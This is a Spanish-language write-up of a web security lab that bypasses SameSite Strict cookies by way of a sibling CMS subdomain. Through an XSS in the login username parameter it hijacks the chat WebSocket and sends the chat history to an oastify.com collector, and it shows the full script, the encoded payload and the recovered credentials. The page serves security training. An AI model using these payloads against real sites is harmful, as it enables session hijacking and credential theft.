> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/web/csrf/samesite-strict-bypass-via-sibling-domain.md).

# Evasión de SameSite Strict mediante dominio hermano

### Omisión de SameSite Strict mediante un dominio hermano

Laboratorio: La funcionalidad de chat en vivo es vulnerable al secuestro de WebSocket entre sitios (CSWSH). El objetivo del laboratorio es acceder a la cuenta de la víctima extrayendo el historial del chat al servidor Burp Collaborator predeterminado; el historial contiene credenciales en texto claro.

Usa el servidor de exploits proporcionado para lanzar un ataque CSWSH que exfiltre el historial del gato de la víctima.

<figure><img src="/files/69c9e60ab60b34712aea7242fbf29ebd752cff3b" alt=""><figcaption></figcaption></figure>

El chat funciona mediante WebSocket y el historial pasa a través de él.

<figure><img src="/files/480afd74a6be76489354afc7cfb772af7ab7a4e8" alt=""><figcaption></figcaption></figure>

La cookie de sesión se envía con SameSite (bloqueando los escenarios convencionales de redirección entre sitios).

<figure><img src="/files/11335f151f9396be3815cd5bfe351f82b6097338" alt=""><figcaption></figcaption></figure>

El archivo del cliente en JavaScript (por ejemplo, `chat.js`) se carga desde un subdominio del CMS que devuelve un `Access-Control-Allow-Origin` encabezado que permite la interacción desde este subdominio.

<figure><img src="/files/08f8d3357fbc50c467e103b305926edb2b238045" alt=""><figcaption></figcaption></figure>

El panel de autenticación del CMS es vulnerable a inyección de scripts mediante el `username` parámetro (por ejemplo, `?username=<script>alert(0)</script>&password=test`).

<figure><img src="/files/472b1d75bed331d6c5cfcd292a810c561570f8d5" alt="" width="375"><figcaption></figcaption></figure>

```javascript
<script>alert(0)</script>
```

<figure><img src="/files/347931141e09865a72d6dc3c6dc5239e68b8c8ad" alt=""><figcaption></figcaption></figure>

```
/login?username=<script>alert(0)</script>&password=test
```

<figure><img src="/files/888a2715b89c8504f2f0e7f6c1e1dae1b591acb1" alt=""><figcaption></figcaption></figure>

Usando esta inyección, puedes ejecutar JavaScript en el contexto del subdominio vulnerable, estableciendo así un WebSocket autenticado (las cookies se envían entonces, ya que el origen es el mismo) al servidor de chat.

### Enfoque (resumen)

1. Coloca un script malicioso en el `username` parámetro del formulario de inicio de sesión del subdominio CMS.
2. Este script abre una conexión WebSocket al servidor de chat y envía una `READY` señal.

{% code overflow="wrap" %}

```javascript
<script>
  var ws = new WebSocket("https://0a5900a203763a50c2810c7a0074009d.web-security-academy.net/chat");

  ws.onopen = function() {
    ws.send("READY");
  };

  ws.onmessage = function(info) {
    fetch("https://68cxlq1fllh96z60yqiw496jiao4cu0j.oastify.com/?data=" + btoa(info.data));
  };
</script>
```

{% endcode %}

3. Al recibir mensajes del WebSocket (historial del gato), el `fetch` script codifica estos datos (base64) y los envía a un servidor controlado por el atacante (OAST/Oastify).

```bash
/?data=eyJ1c2VyIjoiQ09OTkVDVEVEIiwiY29udGVudCI6Ii0tIE5vdyBjaGF0dGluZyB3aXRoIEhhbCBQbGluZSAtLSJ9
```

<figure><img src="/files/0611b27271e1ad265d314f6efed057319791999d" alt=""><figcaption></figcaption></figure>

Aloja/serve una redirección en el servidor de exploits para empujar a la víctima a visitar la URL vulnerable (inicio de sesión con `username` que contiene el script).

```bash
echo "eyJ1c2VyIjoiQ09OTkVDVEVEIiwiY29udGVudCI6Ii0tIE5vdyBjaGF0dGluZyB3aXRoIEhhbCBQbGluZSAtLSJ9" | base64 -d
```

#### Resultados observados

* Cuando se recibió la consulta exfiltrada, el `de datos` parámetro contenía una cadena base64; al decodificarla obtenemos la entrada del gato.
* Ejemplo de payload recibido (decodificado en base64):

```json
{"user":"CONNECTED","content":"-- Ahora chateando con Hal Pline --"}
```

<figure><img src="/files/252ca73146d4e500483e85733eb1b828a0a0d9ff" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/e1947a786e59869a0f918428b4e638f520397e10" alt=""><figcaption></figcaption></figure>

Al inyectar desde el contexto autenticado (subdominio CMS), el script transmitió mensajes que contenían conversaciones de usuario y, en este caso, un mensaje que contenía las credenciales en lenguaje claro.

{% code overflow="wrap" %}

```
https://cms-0a5900a203763a50c2810c7a0074009d.web-security-academy.net/login?username=%3Cscript%3E+++var+ws+%3D+new+WebSocket%28%22https%3A%2F%2F0a5900a203763a50c2810c7a0074009d.web-security-academy.net%2Fchat%22%29%3B++++ws.onopen+%3D+function%28%29+%7B+++++ws.send%28%22READY%22%29%3B+++%7D%3B++++ws.onmessage+%3D+function%28info%29+%7B+++++fetch%28%22https%3A%2F%2F68cxlq1fllh96z60yqiw496jiao4cu0j.oastify.com%2F%3Fdata%3D%22+%2B+btoa%28info.data%29%29%3B+++%7D%3B+%3C%2Fscript%3E&password=ef
```

{% endcode %}

{% code overflow="wrap" %}

```javascript
<script>
  location="https://cms-0a5900a203763a50c2810c7a0074009d.web-security-academy.net/login?username=%3Cscript%3E+++var+ws+%3D+new+WebSocket%28%22https%3A%2F%2F0a5900a203763a50c2810c7a0074009d.web-security-academy.net%2Fchat%22%29%3B++++ws.onopen+%3D+function%28%29+%7B+++++ws.send%28%22READY%22%29%3B+++%7D%3B++++ws.onmessage+%3D+function%28info%29+%7B+++++fetch%28%22https%3A%2F%2F68cxlq1fllh96z60yqiw496jiao4cu0j.oastify.com%2F%3Fdata%3D%22+%2B+btoa%28info.data%29%29%3B+++%7D%3B+%3C%2Fscript%3E&password=ef";
</script>
```

{% endcode %}

#### Credenciales extraídas (según se indicó)

* `carlos:hdf3fkk8h7tnltupqs5t` (credenciales encontradas en el historial del gato)

{% code overflow="wrap" %}

```json
{"user":"Hal Pline","content":"No hay problema carlos, es hdf3fkk8h7tnltupqs5t"}
```

{% endcode %}

<figure><img src="/files/47de3ddcc4e5e690839caadb4edbb68e954fa32c" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/web/csrf/samesite-strict-bypass-via-sibling-domain.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
